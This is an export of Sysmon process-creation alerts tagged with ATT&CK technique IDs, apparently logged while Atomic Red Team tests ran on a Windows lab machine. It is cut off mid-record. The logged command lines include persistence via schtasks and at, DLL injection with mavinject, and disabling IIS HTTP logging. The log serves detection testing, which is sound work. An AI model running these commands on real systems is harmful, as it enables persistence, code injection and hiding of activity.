[T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.640159Z"">
</TimeCreated>
<EventRecordID>4088</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.531</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001025AD3E00</Data>
<Data Name=""ProcessId"">4552</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1563548266.608481,2019-07-19T18:57:46.608481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.459733Z"">
</TimeCreated>
<EventRecordID>4086</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.443</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C4A83E00</Data>
<Data Name=""ProcessId"">1408</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Task Scheduler Configuration Tool</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA6A-5D31-0000-001072A63E00</Data>
<Data Name=""ParentProcessId"">4276</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.459733,2019-07-19T18:57:46.459733+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.422427Z"">
</TimeCreated>
<EventRecordID>4085</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.411</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-001072A63E00</Data>
<Data Name=""ProcessId"">4276</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.422427,2019-07-19T18:57:46.422427+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.207200Z"">
</TimeCreated>
<EventRecordID>4084</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.174</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010C09D3E00</Data>
<Data Name=""ProcessId"">3224</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.094355,2019-07-19T18:57:46.094355+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;at 13:20 /interactive cmd&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:46.073651Z"">
</TimeCreated>
<EventRecordID>4082</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:46.051</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6A-5D31-0000-0010B2953E00</Data>
<Data Name=""ProcessId"">5036</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;at 13:20 /interactive cmd&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548264.283188,2019-07-19T18:57:44.283188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:16.552097Z"">
</TimeCreated>
<EventRecordID>4080</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:16.531</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4C-5D31-0000-001077603D00</Data>
<Data Name=""ProcessId"">6172</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548236.552097,2019-07-19T18:57:16.552097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c .\bin\T1055.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:16.496455Z"">
</TimeCreated>
<EventRecordID>4079</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:16.477</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4C-5D31-0000-0010655D3D00</Data>
<Data Name=""ProcessId"">2596</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c .\bin\T1055.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1179] Hooking detected,1563548236.496455,2019-07-19T18:57:16.496455+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\mavinject.exe ) through command line ( &quot;C:\Windows\system32\mavinject.exe&quot; 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:15.776993Z"">
</TimeCreated>
<EventRecordID>4078</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:15.754</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4B-5D31-0000-0010CB413D00</Data>
<Data Name=""ProcessId"">2604</Data>
<Data Name=""Image"">C:\Windows\System32\mavinject.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft Application Virtualization Injector</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\mavinject.exe&quot; 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548235.776993,2019-07-19T18:57:15.776993+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:14.991615Z"">
</TimeCreated>
<EventRecordID>4077</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:14.972</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-00107A2C3D00</Data>
<Data Name=""ProcessId"">2584</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.991615,2019-07-19T18:57:14.991615+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\System32\inetsrv\appcmd.exe set config &quot; &quot;Default /section:httplogging /dontLog:true&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:14.944276Z"">
</TimeCreated>
<EventRecordID>4076</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:14.928</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-00106C293D00</Data>
<Data Name=""ProcessId"">4056</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\System32\inetsrv\appcmd.exe set config &quot; &quot;Default /section:httplogging /dontLog:true&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548234.944276,2019-07-19T18:57:14.944276+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:14.758535Z"">
</TimeCreated>
<EventRecordID>4075</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:14.745</Data>
<Data Name=""ProcessGuid"">747F3D96-DA4A-5D31-0000-0010EE223D00</Data>
<Data Name=""ProcessId"">1012</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
